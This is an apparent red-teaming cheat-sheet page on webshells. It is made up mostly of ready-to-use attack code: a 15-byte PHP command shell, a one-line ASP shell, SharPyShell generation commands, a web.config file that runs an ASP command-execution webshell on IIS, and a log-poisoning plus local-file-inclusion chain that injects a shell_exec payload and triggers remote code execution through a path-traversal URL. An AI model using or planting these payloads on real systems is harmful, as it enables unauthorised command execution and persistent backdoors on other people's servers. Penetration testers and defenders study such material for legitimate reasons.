Red Teaming and Malware Analysis
@sirpedrotavaresseguranca-informatica.pt0xSI_f33d
Search…
About
Red Teaming
Cheat Sheet
Web
Misc
File Upload bypass
Authentication bypass
SQL Injection
XSS
XXE
Reverse-shell
Webshell
(De)Serialization
Active Directory
Services by port
Hardening
Stuff
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
Resources
Malware Analysis
Unpacking
Basic tips
Malware instrumentation with frida
Tools
Resources
Mobile
Tools
Reverse iOS ipa
Reverse Android APKs
Basic tips
Resources
IoT / Reverse / Firmware
Basic tips
Reverse IoT devices
Tools
Resources
Powered By GitBook
Webshell

Webshell

PHP 15 bytes shell

1
<?=`$_GET[0]`?>
Copied!

Asp/Aspx

One Line ASP Shell
1
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Copied!
Request with: http://target/shell.asp?cmd=ipconfig
SharPyShell: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications.
1
python SharPyShell.py generate -p somepassword
2
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
Copied!

Running web.config as an ASP file

Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:
1
<?xml version="1.0" encoding="UTF-8"?>
2
<configuration>
3
<system.webServer>
4
<handlers accessPolicy="Read, Script, Write">
5
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
6
</handlers>
7
<security>
8
<requestFiltering>
9
<fileExtensions>
10
<remove fileExtension=".config" />
11
</fileExtensions>
12
<hiddenSegments>
13
<remove segment="web.config" />
14
</hiddenSegments>
15
</requestFiltering>
16
</security>
17
</system.webServer>
18
</configuration>
19
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
20
<%
21
Response.write("-"&"->")
22
' it is running the ASP code if you can see 3 by opening the web.config file!
23
Response.write(1+2)
24
Response.write("<!-"&"-")
25
%>
26
-->
Copied!
webshell/fuzzdb-webshell/asp at master · tennc/webshell
GitHub
Examples of asp webshells.
1
<?xml version="1.0" encoding="UTF-8"?>
2
<configuration>
3
<system.webServer>
4
<handlers accessPolicy="Read, Script, Write">
5
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
6
</handlers>
7
<security>
8
<requestFiltering>
9
<fileExtensions>
10
<remove fileExtension=".config" />
11
</fileExtensions>
12
<hiddenSegments>
13
<remove segment="web.config" />
14
</hiddenSegments>
15
</requestFiltering>
16
</security>
17
</system.webServer>
18
</configuration>
19
20
<%
21
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
22
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
23
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
24
Function getCommandOutput(theCommand)
25
Dim objShell, objCmdExec
26
Set objShell = CreateObject("WScript.Shell")
27
Set objCmdExec = objshell.exec(thecommand)
28
getCommandOutput = objCmdExec.StdOut.ReadAll
29
end Function
30
%>
31
32
<FORM action="" method="GET">
33
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
34
<input type="submit" value="Run">
35
</FORM>
36
<PRE>
37
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
38
<%Response.Write(Request.ServerVariables("server_name"))%>
39
<p>
40
<b>The server's port:</b>
41
<%Response.Write(Request.ServerVariables("server_port"))%>
42
</p>
43
<p>
44
<b>The server's software:</b>
45
<%Response.Write(Request.ServerVariables("server_software"))%>
46
</p>
47
<p>
48
<b>The server's software:</b>
49
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
50
<% szCMD = request("cmd")
51
thisDir = getCommandOutput("cmd /c" & szCMD)
52
Response.Write(thisDir)%>
53
</p>
54
<br>
Copied!

Log poisoning + LFI + shell

Required: Initial LFI found
😼
Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.
We can also try to add via netcat:
1
nc -nv 10.11.1.35 80
2
(UNKNOWN) [10.11.1.35] 80 (http) open
3
<?php echo shell_exec($_GET['cmd']);?>
4
5
HTTP/1.1 400 Bad Request
Copied!
Next, get RCE by adding the cmd parameter:
1
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
Copied!
Get Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION )
Medium
RCE via LFI Log Poisoning - The Death Potion
Medium
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
GitHub
Previous
Reverse-shell
Next
(De)Serialization
Last modified 4mo ago
Copy link
Contents
Webshell
PHP 15 bytes shell
Asp/Aspx
Running web.config as an ASP file
Log poisoning + LFI + shell